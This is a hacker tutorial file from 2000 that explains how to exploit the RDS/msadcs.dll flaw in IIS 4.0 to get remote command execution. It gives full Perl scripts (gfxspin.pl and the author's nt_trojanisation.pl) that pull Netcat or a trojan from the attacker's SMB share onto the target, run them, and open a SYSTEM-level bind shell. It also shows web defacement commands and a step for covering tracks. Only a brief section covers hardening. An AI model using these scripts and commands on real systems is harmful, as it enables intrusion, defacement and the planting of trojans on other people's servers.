/*          						*
*   "Understanding the RDS/IIS exploit" -  for          *
*   interScape made by p4riah , march 2000    		*
*        						*/



Introduction - short overview:
------------------------------*

Right on start i want to turn attention on complete neglection of this problem and its wrong
exploitation. Most administrators can't make out this problem in completeness, and they are not
capable of solving it. This has been a big kick for Microsoft and their security experts. Yet
if we look at the problem on the other side, many hackers are not efficient enough to gain full
control over the system, and we can see this in large number of defacements in 1999. year in
which hackers use this technique (RDS/msadc.pl), but with limited access to the system. If we
look on Attrition defacements mirror archive, we may notice that hackers over the whole 1999.
year were attacking many  .gov and .mil domain which tells us how large this problem is. Yet
with this technique of attacking a hacker can't tell us that he or she has large knowledge,
but sometimes this technique is necessary if we need a quick view in information. Through this
text i'll describe where the problem exist, which technique of attacking is possible through
this exploit, how to use it to gain full control over system, and which measure of carefulness
is necessary to stop this attack. 

RDS/IIS 4.0 problem - basic description:
----------------------------------------*

Let's start from elements which allow hackers to execute the attack. Per default installation 
IIS 4.0 installs MDAC v1.5 (Microsoft Data Acess Components) which include Remote Data
Service (RDS) server. RDS is connected with Open Database Connectivity (ODBC) component &
in combination with it gives us the possibility to execute remote commands through queries.
With this we also need MS Jet engine combined with Jet pipe/VBA possibilities. Aslo we need 
cmd.exe 'cause this program gives us functionality over shell and like its second feature we
may use command.com. Without /msadc/msadcs.dll file on server theoretically this can't be
done cause this file is used for exposing DataFactory component, which is combined with
RDSserver. Note that when i talk about msadcs.dll file, the webserver (IIS) comes to all this
description (msadcs.dll is on webserver). At this point DataFactory (also known as
AdvancedDataFactory) leaves us 4. possibilities: Query (important to hacker), CreateRecordSet, 
ConvertToString and SubmitChanges. From this four we need only two for full exploitation.
SubmitChanges and Query. I'll talk about Query cause this is primary to the hacker. Query gives
us the possibility to execute queries over an existing database, in other words we can rewrite
database with our own information. Yet here exist little problems unconfined with exploit,
but their solution is included in perl script (msadc2.pl). When we use queries and execute them
all this is connected with ActiveDataFactory component. Through this we must pass DSN 
database and here a problem exists, 'cause DSN requires UIDs (User IDentifier) and passwords.
The solution for this problem we can find in the perl script where this is solved with creating
one new DSN database which is adapted to our point. So when we run msadc2.pl script, it gives
us a shell and script send queries with embed NT command lines. In short description things
are like this:

--
RDS component like part of MDAC is for remote resources over network. All this is passing
through the webserver (IIS). Systematic part of RDS, DataFactory object is for receiving
requests from the client. It gives us read and write access to some system parts. So when we
execute the perl script (msadc2.pl) it uses Microsoft access driver (*.mdb) and in this case
this would be "btcustmr.mdb". Combined, this script executes calls on VBA shell (standard part
of Jet 3.5 engine) function which gives us the possibility to run shell commands where we
start next the point of exploitation.
--

Through this kind of attack a hacker can execute the next type of attacks. I'll mention 
only important types:

- remote attack: standard type of attack to remote system. A hacker attacks through his own
  computer to another on the same or different network.

- local attack: type of attack in which a hacker attacks the system on which he is logged.

- DoS (Denial of Service): technique where hackers use resources of remote computer to gain
  compromisation of all or a couple active services for their own purpose.

- Buffer Owerrun: a hacker uses buffer in some programs and overwrites the program code with his
  own data. With this a hacker can customize the original program operation for system
  compromisation or for crashing other programs.

- Privilege compromisation: with privilege comromisation a hacker can customize his own rights 
  (example: customising user account to gain administrator privileges)

- trojan attack: classic trojanisation technique. A hacker executes a program which destroys whole
  system or its important parts.

There are other techniques of attacking where a hacker can manipulate with universal elements like
cookie editing, mail bombing/relaying, GUID (Globally-unique Identifier), access to restricted
documents, shell command executing etc.

Msadc2.pl - short overview:
---------------------------*

Original author of the perl script is Rain Forest Puppy (also know as r.f.p.). ADM and couple
of L0pht security expert were helping him in making and testing script. There exist two versions
of this script. Msadc.pl and Msadc2.pl. Difference between  the first and second versions is in
couple goodies like win95 support, UNC and other small changes.

Attacking through RDS - full system compromisation:
---------------------------------------------------*

Here i'll describe the full procedure how to compromise NT box through the RDS exploit, but first
i'll explain the wrong use of this exploit. During the whole 1999. year, hackers were using this
technique and many .mil and .gov dmomain were defaced with stupid messages on start pages. We can
recognize this type of defacing by next details:

- white background without any title

- if we look in page source we may see that there was no HTML at all, just hacker messages
  
This can be done by the next procedure. A hacker executes the perl script:

"perl msadc2.pl -h www.target.com" - note (instead www we can put IP number here)

And if the system is vulnerable to this type of attack, a hacker can execute the shell command.
Here is shell description: 

--
==========================================================
-- RDS smack v2 - rain forest puppy - / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c_
==========================================================
--

At this point hackers do this:

"echo hacker message > c:\Inetpub\wwwroot\index.html"

Now in the shell we see this:

--
==========================================================
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: Success!
==========================================================
--

- i'll comment this:

By executing this command, file index.html placed in c:\Inetpub\wwwroot\ is overwritten with
hacker messages after "echo" command. Notice that path "c:\Inetpub\wwwroot\" is for default
installation, while bigger networks or ISPs may have little different directories. If we try to
access the webserver through browser we'll see hacker message. In other words, confused visitor
will think that system is completely compromised cause he or she sees that the start page is
changed, and he doesn't know that this is done by a simple "echo" command and matching path.
By this we can conclude that for this type of attack and defacing we don't need extra knowledge
& this gives us a false picture that hacker has been in system, although things are much simpler
and far from this. Therefore we must use other tricks, and for this case i'll mention one
interesting solution. Perl script "gfxspin.pl" by ytcracker. It allows us full access to
information on system and in reality, it is an instruction set. Two versions exist. For win OS
and for Unix OS. In both versions we need excellent Netcat and directory which must be mounted
on attacked system. Note that for win OS script version we need Netcat for NT (from L0pht 
software), while for Unix we use the Unix version. It is important to know that this script will
expose you to specific type of attacks from outside. Both, win and Unix version. I'll explain
this. In win OS version we need one directory (example c:\virtual\*.*). At this point we must
enable "file sharing" to this directory, and that leaves possibility to potential hacker to 
execute specific type of intrusion. Same thing is for Unix OS, cause we must put "+ +" to
/~.rhosts file and with this we are vulnerable to couple attacks through rlogin. For file 
transfer between Unix OS and win OS we use the rpc program. I'll explain how the script works,
but first let's mention what we need for full functionality:

- Directory with enabled "file sharing" option (example c:\virtual\*.*). It is important that
  through sharing configuration we define sharing name to directory which is "share".

- We must put Netcat (win version) in this directory and other files for later uploading.
  Example (index.html, trojan horse, password sniffer etc.).

- Msadc2.pl script (must be in same directory with gfxspin.pl).

Now we run the script with next parameters:

perl gfxspin.pl www.target.com 195.29.231.13 3000

- this is only an example where www.target.com is host name which we attack, IP number is our
  local IP and finaly 3000 is the open port to which we will connect later (with telnet)

Now we see few a messages about processs and finally  the script connects us to attacked system
through telnet. To explain this i'll comment only important parts of the script:

--
########## begin script #########

if (!($ARGV[0])) {
  print "[gfxspin by ytcracker]\n";
  print "usage: gfxspin.pl [remote host] [local ip] [cmd port]\n"; 
  exit; 
}
####################################################################
# "lines above"
# here script expect simple parameters
# which has been explained above

if (!($ARGV[1])) {
  print "[gfxspin by ytcracker]\n";
  print "usage: gfxspin.pl $ARGV[0] [local ip] [cmd port]\n"; 
  exit; 
}

if (!($ARGV[2])) {
  print "[gfxspin by ytcracker]\n";
  print "usage: gfxspin.pl $ARGV[0] $ARGV[1] [cmd port]\n"; 
  exit; 
}
####################################################################
# "lines above"
# Here script is in executing with embed parameters

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "net use y: \\\\$ARGV[1]\\share /YES\n";
close TRGET;

####################################################################
# "lines above"
# here script run msadc2.pl and execute command which tells  
# attacked system that use our directory with enabled file
# sharing option like disc with start letter y:\*.* 
# (instead c:\)

sleep 5;

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "copy y:\\nc.exe \n";
close TRGET;

####################################################################
# "lines above"
# now script will copy Netcat program to attacked system 

sleep 20;

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "nc -l -p $ARGV[2] -e cmd.exe\n";
close TRGET;

####################################################################
# "lines above"
# script runs Netcat with added options and use cmd.exe to
# open a shell (i'll explain this later).

system("telnet $ARGV[0] $ARGV[2]");

####################################################################
# "line above"
# and finaly here script will run telnet and connect us to attacked 
# system

######### end script #########
--

I'll comment this line separately:

--> print TRGET "nc -l -p $ARGV[2] -e cmd.exe\n"; <--

With this we execute Netcat on attacked system with parameters -l, -p, -e. This means
next:

-l= "listening" give us the possibility to connect on port (in this case 3000)
-p= "port" will open port (in this case 3000)
-e= "execute" tell Necat to run some program (in this case cmd.exe)

Now we have full functionality over the shell. Telnet is connected to www.target.com 
on port 3000. When all is done we are in C:\WINNT\system32> directory. I include a log 
file with this txt which contains all information in this directory including Netcat,
cmd.exe and trojan.exe. It is important to know that during connection we have the
NT AUTHORITY\SYSTEM account. Now we can explore the system and run simple commands like:

copy y:\frontpage.ini c:

This is only an example and reality depends only on the hacker and his imagination. If we 
want to know how exactly the link between our and attacked system is mounted we would
run this command:

net use 

which would show next:

--
Status       Local     Remote                    Network

-------------------------------------------------------------------------------
OK           Y:        \\195.29.245.71\share     Microsoft Windows Network
The command completed successfully.
--

At end of exploration we can't forget to delete y: with:

net use y: /DELETE /YES for harder detecting

If we look at this technique description from other point, we can see that this type
of attack depends only on the hacker. Different and little aggressive type of attacking the 
system in full control purpose is system trojanisation. For this example we will use
directory from description above (including all options). Now we must put some trojan
in this directory (trojan.exe). At this point we must run my simple script for NT 
trojanisation with next arguments:

perl nt_trojanisation.pl www.target.com 195.29.221.109

The script will upload trojan.exe on attacked system and then run it. After all process
script will delete p: disc (our directory c:\virtual\*.*)
Here is the script:

--
########## begin script #########

if (!($ARGV[0])) 
{
 print "NT trojanisation by p4riah - basic example\n";
 exit; 
}
if (!($ARGV[1])) 
{
 print "NT trojanisation by p4riah - basic example\n";
 exit; 
}

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "net use p: \\\\$ARGV[1]\\share /YES\n";
close TRGET;

sleep 5;

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "copy p:\\trojan.exe \n";
close TRGET;

sleep 40;
# note that this number depends on line speed between your and targeted box & trojan size

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "trojan.exe\n";
close TRGET;

sleep 15;

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "net use p: /DELETE /YES \n";
close TRGET;

######### end script ##########
--

With this process trojan.exe is uploaded and executed on system. Of couse everything is logged
by the webserver. Log contains your IP, time you requested it and request itself. By default:

GET /msadc/msadcs.dll or POST /msadc/msadcs.dll?AdvancedDataFactory.Query.

Our command will be logged if admininstrator enables SQL/ODBC logging.  If that's enabled, all
of your commands are saved. I don't want to go into details how to delete logs, 'cause yet this
is not and info text about destroying the system. Just exploration. From this 'cause i leave
this like a blockade for all potential intruders. I want to mention that all this is only basic
examples, while it's possible to do much more aggressive attacks. Even from the shell without
any other script.

Securing the system:
--------------------*

Securing the system from this type of attack, should not be hard if we know all facts and 
technical information. Yet search to different type of resources is different from system
to system (with or without RDS, need for scripts etc.). Solution for this is in many different
forms. So i'll try to explain the solution for systems with and without RDS in the default
instalation. First i want to tell which version of MDAC is vulnerable:

- MDAC version 1.5
- MDAC version 2.0

Early in the text i mentioned that for functionality over the shell we need file cmd.exe or 
command.com. Some administrators will try to solve this with simple deleting or moving these
two files. Of course this is a completely wrong solution, 'cause if the hacker finds in some
way, where you put this two files, he can modify the script and adjust it for own good. So
deleting or moving these files will not secure you from this type of attack. All we need is
simple knowledge about the registry keys and we must delete strict files. Let's start!
One of most simplest soulution is to disable RDS support. For quick and simple removing, it 
will be enough to delete "msadcs.dll" which is placed in:

C:\Program Files\Common Files\System\Msadc\msadcs.dll 

Also we must delete all subdirectories in

C:\Program Files\Common Files\System\Msadc\*.*

'cause the script may use VbBusObj. object (/msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetRecordset)
which is placed in system if we install RDS samples durring the instalation. Also we must remove
this key from registry:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W3SVC\Parameters\ADCLaunch 

When all this is done, RDS support is completely disabled and system is secure. But if we need
RDS support there are few things that we must change. Most important of all these is to upgrade
your version of MDAC to 2.1. With this upgrade the old Jet engine 3.5 will be replaced with new 
version 4.0 which is not vulnerable. Also we must enable the "custom handler" support to stop
anonymous Remote Data Service utilization. Note that per default this is not enabled so we must
do this with "regedit". Edit "HandlerRequired" key and set its value to 1. With this we know
enough elements to stop this type of attack.

Conclusion:
-----------*

RDS/IIS exploit as itself is very a serious problem. Like that it deserves much more attention
from administrators and hackers. Yet things tell for themselves and from all this we can see its
wrong use. Administrators must be aware of its power and stop this type of attack in future,
while on the other side hackers must know how to use the full potential of this exploit.

Appendix:
---------*

With this text, ZIP file contains original msadc2.pl script and rds_kit.zip archive in which is
Netcat, gfxspin.pl (both win and unix version), my nt_trojanisation.pl script and log file which
contains information inside an NT system compromised by this method.

Disclaimer:
-----------*

We prohibit hacking,phreaking & such criminal activities. All information found here does not,
in any way,connect to crime. This text is meant for people to learn and be aware of security. If
you try anything that's considered illegal with the information found in this text you will be
to blame yourself,we cannot be blamed for other people's actions. Remember that security is very
important and thus should not be neglected by the people holding the strings.



/*          						*
*   "Understanding the RDS/IIS exploit" -  for          *
*   interScape made by p4riah , march 2000    		*
*        						*
*   Copyright � 1999 by interScape Security Resources	*
*							*
*                 E n d   O f   F i l e			*
*        						*/